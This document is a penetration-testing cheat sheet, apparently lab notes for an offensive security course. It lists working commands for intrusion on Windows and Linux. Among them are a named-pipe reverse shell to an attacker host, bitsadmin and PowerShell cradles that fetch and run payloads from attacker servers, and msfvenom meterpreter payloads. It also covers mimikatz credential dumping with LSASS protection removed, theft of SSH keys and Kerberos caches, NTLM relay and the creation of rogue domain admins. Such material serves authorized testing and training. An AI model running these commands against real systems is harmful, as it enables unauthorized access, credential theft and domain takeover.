# Tools

### bash

```bash
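# Tail the Apache access log (root or adm group membership needed)
sudo tail -f /var/log/apache2/access.log

# Look for SSH private keys in home directories. Covers id_rsa, id_ed25519,
# id_ecdsa and id_dsa and skips the .pub halves; unreadable dirs are silenced.
find /home/ -name "id_*" ! -name "*.pub" 2>/dev/null

# Pull an SSH key file back with scp (user/host/filename here are lab-specific)
scp linuxvictim@linuxvictim:svuser.key ./

# Locate Kerberos credential caches on Linux (krb5cc_<uid> files; a readable
# one can be reused by pointing KRB5CCNAME at it)
sudo find / -name "*krb5cc*" 2>/dev/null

# Check architecture and distribution so payloads/binaries match the target
uname -m
cat /etc/issue
cat /etc/os-release   # /etc/issue is frequently blank or customised
# x86_64: 64-bit Intel/AMD
# i386 or i686: 32-bit Intel/AMD
# armv7l: 32-bit ARM
# aarch64: 64-bit ARM

# Who else is on this box (lateral movement candidates)?
ls -la /home
cat /etc/passwd

# Root-owned SUID binaries (run with root's privileges). Drop -user root to
# also list SUID binaries owned by other users; review every hit for a known
# escalation path rather than trusting the binary name.
find / -type f -user root -perm /u+s -ls 2>/dev/null

# Privilege escalation via sudo rules. /etc/sudoers.d is a directory, so it
# must be read as a glob (the original `cat /etc/sudoers.d` just errors out).
sudo -l
cat /etc/sudoers
cat /etc/sudoers.d/*

# Print the system time in syslog format (handy for correlating log entries)
date +"%b %d %T"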
```

### bitsadmin

```cmd
# Tranfer
bitsadmin /Transfer myJob http://<attacker-ip>/bypass-clm.txt C:\Windows\Tasks\bypass-clm.txt

# Transfer, Decode and Execute
bitsadmin /Transfer myJob http://<attacker-ip>/bypass-clm.txt C:\Windows\Tasks\bypass-clm.txt && certutil -decode C:\Windows\Tasks\bypass-clm.txt C:\Windows\Tasks\bypass-clm.exe && del C:\Windows\Tasks\bypass-clm.txt && C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\bypass-clm.exe
```

### certutil

```cmd
# Encode EXE to B64
certutil -encode \\<attacker-ip>\visualstudio\CLMBypass\bin\Release\CLMBypass.exe \\<attacker-ip>\visualstudio\CLMBypass\bin\Release\CLMBypass.txt
certutil -encode \\<attacker-ip>\visualstudio\bypass-clm\bypass-clm\bin\x64\Release\bypass-clm.exe \\<attacker-ip>\visualstudio\bypass-clm\bypass-clm\bin\x64\Release\bypass-clm.txt

# Decode B64 to EXE
certutil -decode C:\Windows\Tasks\bypass-clm.txt C:\Windows\Tasks\bypass-clm.exe # intallutils
```

### chisel

```bash


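# Attacker box: allow password auth on sshd only if the pivot needs it. It widens
# your own attack surface, so revert it when the engagement is over.
sudo sed -i 's/#PasswordAuthentication yes/PasswordAuthentication yes/g' /etc/ssh/sshd_config

# Restart sshd so the edited config is actually loaded (the original used
# `start`, which is a no-op when sshd is already running)
sudo systemctl restart ssh.service

# proxychains entry for the chisel SOCKS endpoint: sudo nano /etc/proxychains.conf
socks5 127.0.0.1 1080

# Attacker: chisel server accepting reverse tunnels and exposing SOCKS5
chisel server -p 8080 --socks5 --reverse

# Victim: reverse SOCKS tunnel; attacker-side 127.0.0.1:1080 now exits inside the
# victim's network (the tunnel itself is unauthenticated unless --auth is used)
./chisel.exe client <attacker-ip>:8080 R:1080:socks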
```

### cmd

```cmd
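# Privileges of the current token. SeImpersonatePrivilege (and
# SeAssignPrimaryTokenPrivilege) are the interesting ones: potato-style
# escalation to SYSTEM usually starts here.
whoami /priv

# Domain group membership of a user (placeholder instead of the original hard-coded name)
net user <username> /domain | find "Group"

# Create a domain user, allow RDP, make it Domain Admin. Very loud: user creation
# and group membership changes are logged on the DC and usually alerted on.
net user <username> <password> /add /domain
net localgroup "Remote Desktop Users" <username> /add /domain
net group "domain admins" <username> /add /domain

# Run the CLM bypass binary directly
C:\Windows\Tasks\bypass-clm.exe

# InstallUtil: locate the binary (framework version directory varies per host)
dir \Windows\Microsoft.NET\* /s/b | findstr InstallUtil.exe$

# Run an assembly through InstallUtil /U: the Uninstall() method of its Installer
# class executes, a classic way around AppLocker/CLM without launching the exe
# itself. /logfile= /LogToConsole=false suppresses the install log.
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\CustomRunspace.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\CLMBypass.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\bypass-clm.exe
# SpoolSample: coerce dc03 to authenticate to web05 through the print spooler
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\SpoolSample.exe dc03.<domain> web05.<domain>
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\chisel.exe

# Disable NLA on RDP so a plain RDP client can connect. Takes effect for new
# connections; it weakens the host for everyone, so set it back to 1 when done.
reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
# revert: reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 1 /f

# GPOs applied to (or filtered out for) this computer. The original repeated the
# NLA registry command under this heading by mistake; gpresult is the right tool.
gpresult /r /Scope Computer

# Register and start the mimikatz kernel driver (admin required; the file is
# dropped as vmimidrv.sys while the service is named mimidrv). Loading this driver
# is a well-known detection signal.
sc create mimidrv binPath= C:\Windows\Tasks\vmimidrv.sys type= kernel start= demand
sc start mimidrv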
```

### crackmapexec

```bash
# Check if samba is enable and extrack netbios name
crackmapexec smb <victim-ip> # -u <username> -p '<password>'

# Check if samba is enable and extrack netbios name all subnet
crackmapexec smb 172.16.218.0/24
```

### dotnettojscript

```cmd
# Wrap a .NET assembly (read from the attacker SMB share) into a JScript loader;
# the code runs when the script instantiates the serialized object. --ver=v4
# targets the .NET 4 runtime, so it must match the framework present on the target.
DotNetToJScript.exe \\<attacker-ip>\visualstudio\DotNetToJScript\ExampleAssembly\bin\Release\ExampleAssembly.dll --lang=Jscript --ver=v4 -o shell.js
```

### evil-winrm

```bash
# WinRM shell via pass-the-hash: -H takes the NT hash, no plaintext needed.
# The account must be allowed to use WinRM on the target (Administrators or
# Remote Management Users).
evil-winrm -u <domain>\\administrator -H <NTLM-hash> -i <victim-ip>
```

### gcc

```bash
# Build a fully static ELF so it runs regardless of the target's libc, then
# pack it with upx. Note: upx-packed binaries are a frequent AV heuristic hit.
gcc -static shell.c -o shell.elf
upx -9 shell.elf
```

### gobuster

```bash
# Common directories on root
gobuster dir -u http://<victim-ip> -w /home/<username>/.fuzz/dirb/common_4459.txt -a "Mozilla/5.0 (Windows NT 6.2; rv:20.0) Gecko/20121202 Firefox/20.0" -e -t 23 -o xx_root_directories.fuzz

# Common files and directories on root
gobuster dir -u http://<victim-ip> -w /home/<username>/.fuzz/dirb/common_4459.txt -a "Mozilla/5.0 (Windows NT 6.2; rv:20.0) Gecko/20121202 Firefox/20.0" -e -t 23 -x .php,.html,.txt -o xx_root_files_directories.fuzz
```

### hashcat

```bash
# Descifrar Hash NTLM v2
# Crack NetNTLMv2 (mode 5600). --force ignores hashcat's warnings (e.g. driver
# checks) and can mask real problems; drop it once the setup is known to work.
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt --force 

# Crack an Ansible Vault hash (mode 16900)
hashcat -m 16900 hash.txt /usr/share/wordlists/rockyou.txt --force 

# Kerberos TGS-REP etype 23 (kerberoast). -a 3 is mask mode; no mask is given
# here, so hashcat falls back to its built-in default mask
hashcat hashes.txt -m 13100 -a 3

# Look up the mode number for a hash type
https://hashcat.net/wiki/doku.php?id=example_hashes
```

### hostrecon

```powershell
# Dot-source the script, run the host survey, and keep a copy on disk
# (C:\Windows\Tasks is typically writable by standard users, hence its use for drops)
. .\HostRecon.ps1
Invoke-HostRecon
Invoke-HostRecon | Out-File C:\Windows\Tasks\HostRecon.txt
```

### impacket

```bash
# Obtener todos los usuarios del dominio, sin pedir pass y usando autenticación kerberos
# Enumerate all domain users with Kerberos auth from an existing ticket cache:
# -k -no-pass reads the TGT from KRB5CCNAME, so the cache must belong to
# <username> and the DC name must resolve (Kerberos needs FQDNs, not IPs).
GetADUsers.py -all -k -no-pass -dc-ip <victim-ip> <domain>/<username>

# Kerberoast: request a TGS for every SPN-bearing user (crack with hashcat -m 13100)
GetUserSPNs.py -request -k -no-pass -dc-ip <victim-ip> <domain>/<username>

# AS-REP roast: users from the file with pre-auth disabled get their hash written
# in john format
GetNPUsers.py -k -no-pass -dc-ip <victim-ip> <domain>/<username> -usersfile users -format john -outputfile hashes
```

### johntheripper

```bash
# Descargar clave por ssh
scp <username>@<victim-ip>:/home/<username>/.ssh/id_rsa ./

# Convertir clave a formato legible por johntheripper
python /usr/share/john/ssh2john.py id_rsa > <username>.hash

# Fuerza bruta
sudo john --wordlist=/usr/share/wordlists/rockyou.txt svuser.hash
```

### metasploit

#### meterpreter

```bash
# View channels
# List open channels
channel -l

# Current user of the session
getuid

# Migrate into a longer-lived process (-N takes the first process with that name).
# explorer.exe: interactive user; w3wp.exe: IIS worker; spoolsv.exe: SYSTEM,
# which presumably needs elevated rights to migrate into
migrate -N explorer.exe
migrate -N w3wp.exe
migrate -N spoolsv.exe

# Spawn a hidden notepad and migrate into it (replace XXXX with the PID execute prints)
execute -H -f notepad
migrate XXXX

# Search the filesystem for a file by name
search -f local.txt

# Read LAPS passwords with the session's rights
run post/windows/gather/credentials/enum_laps
```

#### msfconsole

```bash
# Windows 32 bits (para Word)
# Handler for the 32-bit HTTPS stager (used for the Word macro payload).
# sudo is only there so the handler can bind port 443.
sudo msfconsole -q -x "use multi/handler; set payload windows/meterpreter/reverse_https; set exitfunc thread; set lhost <attacker-ip>; set lport 443; exploit"

# Handler for the 64-bit HTTPS stager
sudo msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_https; set lhost <attacker-ip>; set lport 443; exploit"

# Linux handler. `MeterpreterTryToFork true` forks the session into its own
# process, which behaves like migrate on Windows and makes the `shell` command usable
sudo msfconsole -q -x "use multi/handler; set payload linux/x64/meterpreter/reverse_tcp; set lhost <attacker-ip>; set lport 443; set MeterpreterTryToFork true; exploit"

# Create a workspace
workspace -a [WORKSPACE]

# Import an nmap XML result
db_import all.xml

# List or add hosts
hosts
hosts -a [IP]
```

#### msfvenom

```bash
# 32 bits (para Word)
# 32-bit HTTPS stager as a C# byte array (for the Word macro / VBA loader).
# sudo is not needed for msfvenom itself, only for writing under /var/www/html
sudo msfvenom -p windows/meterpreter/reverse_https LHOST=<attacker-ip> LPORT=443 EXITFUNC=thread -f csharp

# 64-bit exe served from the web root
sudo msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<attacker-ip> LPORT=443 -f exe -o /var/www/html/shell.exe

# ASPX web shell variant for IIS targets
sudo msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<attacker-ip> LPORT=443 -f aspx -o /var/www/html/shell.aspx

# Linux shellcode as a C array. `-k MeterpreterTryToFork=true` forks the session
# (behaves like migrate on Windows and makes the `shell` command usable)
sudo msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<attacker-ip> LPORT=443 -k MeterpreterTryToFork=true -f c

# Raw shellcode blob, for custom loaders
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<attacker-ip> LPORT=443 -f raw -o shell.bin
```

### mimikatz

```cmd


# Obtener NTLM de administrador del dominio en Web05
# DCSync the domain administrator's NT hash. Needs replication rights on the
# domain (typically Domain Admin); the original note tied this to one lab host.
C:\Windows\Tasks\mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:<domain> /user:administrator /csv" "exit"

# Load the mimidrv kernel driver (!+), strip LSASS's PPL protection, then dump
# logon credentials. Requires the driver service from the cmd section and admin
# rights; this is about as noisy as credential access gets.
C:\Windows\Tasks\mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "sekurlsa::logonpasswords" "exit"

# Elevate to SYSTEM and dump LSA secrets (service account passwords and similar)
C:\Windows\Tasks\mimikatz.exe "token::elevate" "lsadump::secrets" "exit"

# Dump account hashes from LSA by patching it in memory (no driver, still needs admin)
./mimikatz.exe "lsadump::lsa /patch" "exit"
```

### mssql

Connect with windows-auth

```bash
# Windows (domain) authentication with the password on the command line:
# it will show up in shell history and process listings
mssqlclient.py <username>:<password>@<victim-ip> -port 1433 -windows-auth
```

Connect with password

```bash
# SQL authentication; with no password in the URL the tool prompts for it
mssqlclient.py <username>@<victim-ip> # prompts for <password>
```

### netcat nc

```bash
# 
# Listener with readline support (history, arrow keys) for the incoming shell
rlwrap -cAr nc -lvnp 443
# Reverse shell from the victim through a named pipe (works without nc -e)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker-ip> 443 >/tmp/f

# Share a file over netcat. Plaintext and unauthenticated: anyone who connects
# first gets the file, so compare hashes on both ends afterwards.
# Attacker
cd /var/www/html
nc -nlvp 443 < /var/www/html/chisel

# Victim (/dev/tcp is a bash feature, so the target shell must be bash)
cat > chisel < /dev/tcp/<attacker-ip>/443
chmod +x chisel

# Verify against md5sum of the original on the attacker side
md5sum chisel

# Windows to Linux transfer
# Linux side receives
nc -lp 1234 > mimi.txt
# Windows side sends
nc.exe <attacker-ip> 1234 < mimi.txt
# IMPORTANT: close the connection from the Linux (receiving) side, the sender
# does not reliably exit on its own
```

### nmap

```bash
# Escaneo de versión con scripts a todos los puertos, tratar a todos como online, deteccion de sistema operativo, minimo de paquetes por segundo
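# Full TCP connect scan of every port with scripts and version detection, all
# hosts treated as up, OS detection, floor of 1000 packets/s. -A already
# implies -sC -sV -O, so the explicit -sC -sV are redundant but harmless.
nmap -sT -sC -sV -p- -Pn -A -vvv -T3 --min-rate=1000 -oA nmap/all -iL scope.txt

# Subnet scans (lab addresses)
# RDP only, very fast (duplicate -A from the original removed)
nmap -sTV -A -Pn -p 3389 -vvv -oA nmap/subred 172.16.237.160,165,166,167,168
# Top 25 ports, also yields NetBIOS/OS information
nmap -sTV -A -Pn --top-ports 25 -vvv -oA nmap/subred 172.16.237.160,165,166,167,168
# Same but aggressive: works, yet -T5 plus a rate floor can drop the pivot connection
nmap -sTV -A -Pn --top-ports 25 --min-rate=1000 -T5 -vvv -oA nmap/subred 172.16.237.160,165,166,167,168
# Through proxychains: connect scan only (-sT), no ping, no DNS (-n); SYN and OS
# scans cannot be carried over a SOCKS proxy
proxychains -q nmap -sT -Pn -n --top-ports 25 -T3 --min-rate=1000 -vvv -oA nmap/subred 172.16.237.150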
```

### ntlmrelayx

```bash
# Relay captured NTLM authentication to the target's SMB service (lab address).
# Only works against hosts that do not require SMB signing; --no-http-server
# leaves the HTTP listener off so only SMB auth is captured
ntlmrelayx.py --no-http-server -smb2support -t smb://172.16.183.152
```

### lapstoolkit

```powershell
# Import
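# Load the module: either dot-source it or Import-Module it. The path needs the
# .\ prefix (the original `Import-Module .LAPSToolkit.ps1` does not resolve).
. .\LAPSToolkit.ps1
Import-Module .\LAPSToolkit.ps1

# Groups delegated read access to LAPS passwords
Find-LAPSDelegatedGroups

# Rights on each LAPS-enabled computer: groups with read access and principals
# holding "All Extended Rights" (which also lets them read the password)
Find-AdmPwdExtendedRights

# LAPS-enabled computers, password expiry, and the password itself where readable
Get-LAPSComputers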
```

### ldapsearch

```bash
# get dump users
# Dump user objects over LDAP with Kerberos (GSSAPI) auth: the bind uses the TGT
# in KRB5CCNAME (kinit first). -D/-W are simple-bind options and are presumably
# not used by GSSAPI here - TODO confirm and drop them if so.
ldapsearch -Y GSSAPI -H ldap://dmzdc01.<domain> -D "<username>@<domain>" -W -b "dc=<base-domain>,dc=com" '(&(objectClass=user))'

# Same bind, listing only accounts with an SPN (kerberoast candidates)
ldapsearch -Y GSSAPI -H ldap://dmzdc01.<domain> -D "<username>@<domain>" -W -b "dc=<base-domain>,dc=com" "servicePrincipalName=*" servicePrincipalName

```

### linpeas

```bash
# Grabar session de terminal
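# Record the terminal session (timing to timing.log, output to session.log); run
# linpeas inside it, then Ctrl+D to stop recording
script -t 2> timing.log -a session.log

# Pull the log back and render the ANSI colours to HTML (redirect instead of a
# useless `cat | aha`)
scp <username>@<victim-ip>:session.log ./
aha --black --title "Terminal Session USER MACHINE" < session.log > linpeas_<username>_<machine>.html

# The log holds everything displayed in the session, credentials included:
# delete it on the target too, not just locally
rm timing.log session.log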
```

### powermad

```powershell
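# Load Powermad (the original left this step empty; dot-source the script from
# wherever it was dropped)
. .\Powermad.ps1

# Create a machine account for a resource-based constrained delegation attack.
# Only works while ms-DS-MachineAccountQuota still lets the current user add
# computers (default 10). The password ends up in the command line and history,
# so use a throwaway value and remove the account when done.
New-MachineAccount -MachineAccount <username> -Password $(ConvertTo-SecureString '<password>' -AsPlainText -Force) -Verbose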
```

### PowerShell

Add domain admin

```powershell
# On the Windows host: create a domain user, grant RDP, add to Domain Admins
# (loud: user creation and group changes are logged on the DC)
net user <username> <password> /add /domain
net localgroup "Remote Desktop Users" <username> /add /domain
net group "domain admins" <username> /add /domain
# Sanity-check the new account from the Windows host
runas /user:<username> "Powershell.exe /c whoami"
# From the attacker Linux box: RDP in as the new domain user, sharing a local folder
rdesktop -a 8 -z -x l -u <username> -p <password> -d <domain> -g 1366x768 <victim-ip> -r sound:off -r clipboard:CLIPBOARD -r disk:home=/home/<username>/osep
```

Add local admin with RDP

```powershell
# On the Windows host: create a local user, make it admin, grant RDP
net user <username> <password> /add
net localgroup Administrators <username> /add
net localgroup "Remote Desktop Users" <username> /add
# Sanity-check the new account from the Windows host
runas /user:<username> "Powershell.exe /c whoami"
# From the attacker Linux box: RDP in as the new local user (password on the
# command line, so it lands in shell history)
rdesktop -a 8 -z -x l -u <username> -p <password> -g 1366x768 <victim-ip> -r sound:off -r clipboard:CLIPBOARD -r disk:home=/home/<username>/osep
```

Change user password

```powershell
# Credential of the account that holds reset-password rights over the target user
$creds = New-Object System.Management.Automation.PSCredential ("<domain>\<username>", (ConvertTo-SecureString "<password>" -AsPlainText -Force)) 
# New password for the target user
$UserPassword = ConvertTo-SecureString '<password>' -AsPlainText -Force 
# Reset it (Set-DomainUserPassword is presumably PowerView's - load it first).
# This locks the legitimate user out; note the old password if it must be restored.
Set-DomainUserPassword -Identity <username> -AccountPassword $UserPassword -Credential $creds -Verbose 
```

Change user password and cover

```powershell
# Same reset as above with the variables named for the two roles:
# $remote is the account doing the reset, $creds the new password
$remote = New-Object System.Management.Automation.PSCredential ("<domain>\<username>", (ConvertTo-SecureString "<password>" -AsPlainText -Force)) 
$creds = ConvertTo-SecureString '<password>' -AsPlainText -Force 
# Password resets are logged on the DC; "cover" here is about restoring the
# original afterwards, which this snippet does not do by itself
Set-DomainUserPassword -Identity <username> -AccountPassword $creds -Credential $remote -Verbose 
```

Check 64-bit OS and shell process

```powershell
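# True when the OS is 64-bit. That alone does not say whether *this* shell is:
# a 32-bit PowerShell on a 64-bit OS needs x86 payloads and SysNative paths, so
# also check the process itself.
[Environment]::Is64BitOperatingSystem
[Environment]::Is64BitProcess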
```

Check CLM

```powershell
# "FullLanguage" means no restriction; "ConstrainedLanguage" means CLM is active
# and .NET/COM access is limited (hence the InstallUtil/bypass tooling above)
$ExecutionContext.SessionState.LanguageMode
```

Enable PSRemoting

```powershell
# Turns on WinRM, creates the listener and opens the firewall rules (admin
# required). A persistent configuration change: revert it after the engagement.
Enable-PSRemoting -Force
```

Load Assembly

```powershell
# Fetch Rubeus over plain HTTP and load it into the current process from memory
# (no file on disk, but the download and Assembly.Load are visible to AMSI/EDR)
$data = (New-Object System.Net.WebClient).DownloadData('http://<attacker-ip>/Rubeus.exe')
$assem = [System.Reflection.Assembly]::Load($data)
# S4U2self/S4U2proxy as the machine account (<username>$, RC4 key = its NT hash)
# to impersonate administrator for cifs/file01 and inject the ticket (/ptt).
# .Split() breaks the string on whitespace into Rubeus' argv.
[Rubeus.Program]::Main("s4u /user:<username>$ /rc4:<rc4> /impersonateuser:administrator /msdsspn:cifs/file01 /ptt".Split())
```

Run DLL

```powershell
# Execute the exported `run` function of a dropped DLL through rundll32
# (a well-known LOLBin; the path under C:\Windows\Tasks is the usual drop location)
Rundll32 c:\windows\tasks\shell.dll,run
```

Runas

```cmd
# Start a PowerShell as another domain user (prompts for the password; needs the
# user's plaintext, not a hash)
runas /user:<domain>\<username> powershell
```


